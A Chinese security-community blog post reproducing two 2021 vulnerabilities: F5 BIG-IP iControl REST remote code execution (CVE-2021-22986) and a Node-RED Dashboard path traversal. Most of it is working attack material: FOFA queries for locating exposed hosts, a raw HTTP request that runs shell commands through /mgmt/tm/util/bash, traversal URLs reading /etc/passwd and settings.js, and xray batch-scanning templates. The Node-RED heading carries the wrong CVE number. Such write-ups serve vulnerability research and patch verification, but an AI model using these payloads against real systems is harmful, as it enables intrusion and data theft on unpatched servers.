F5 BIG-IP & Node-RED漏洞复现集合

共 2489字,需浏览 5分钟

 ·

2021-07-21 16:05

作者:huluwa  编辑:白帽子社区运营团队




    "白帽子社区在线CTF靶场BMZCTF,欢迎各位在这里练习、学习,BMZCTF全身心为网络安全赛手提供优质学习环境,链接(http://www.bmzclub.cn/)

"    




F5 BIG-IP 远程代码执行(CVE-2021-22986)


1.漏洞描述


F5 BIG-IP 存在代码执行漏洞,攻击者通过 BIG-IP iControl REST 接口进行网络访问,在构造恶意命令完成代码执行,从而控制目标机器。


2.影响版本

F5 BIG-IP 16.0.0-16.0.1F5 BIG-IP 15.1.0-15.1.2F5 BIG-IP 14.1.0-14.1.3.1F5 BIG-IP 13.1.0-13.1.3.5F5 BIG-IP 12.1.0-12.1.5.2F5 BIG-IQ 7.1.0-7.1.0.2F5 BIG-IQ 7.0.0-7.0.0.1F5 BIG-IQ 6.0.0-6.1.0
3.漏洞复现


FOFA查询语法:icon_hash="-335242539"POC:POST /mgmt/tm/util/bash HTTP/1.1Host: IP:8443Connection: closeContent-Length: 39Cache-Control: max-age=0Authorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token:Upgrade-Insecure-Requests: 1Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}

附xray 批量检测脚本:

name: poc-yaml-f5-big-ip-rce-cve-2021-22986set:  r1: randomInt(800000000, 1000000000)  r2: randomInt(800000000, 1000000000)rules:  - method: POST    path: /mgmt/tm/util/bash    headers:      Content-Type: application/json      Authorization: Basic YWRtaW46QVNhc1M=      X-F5-Auth-Token: " "    body: >-      {"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"}    follow_redirects: false    expression: |      response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))detail:  author: huluwa  links:    - https://support.f5.com/csp/article/K03009991

Node-RED 任意文件读取漏洞CVE-2021-22986



1. 漏洞描述

Node-RED由于未对url中传输的路径进行严格过滤,导致攻击者可构造特殊路径进行任意文件读取,比如settings.js、passwd文件等


2. 影响版本

Node-Red-Dashboard version < 2.26.2

(Node-Red插件Node-Red-Dashboard,如果未安装此插件,或插件版本高于2.26.2,则不受影响)


3. 漏洞复现

FOFA查询语法:title="Node-RED"POC:/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

附xray 批量检测脚本:
name: poc-yaml-node-red-cve-2021-3223rules:  - method: GET    path: /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd    expression: |      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)detail:  author: huluwa  links:    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3223


往期精彩文章




Apereo CAS 4.1 反序列化命令执行漏洞复现
漏洞复现合集
Spring Boot Actuator 未授权访问利用实战利用
通达OA漏洞整理




技术支持:白帽子社区团队
— 扫码关注我们 


浏览 131
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报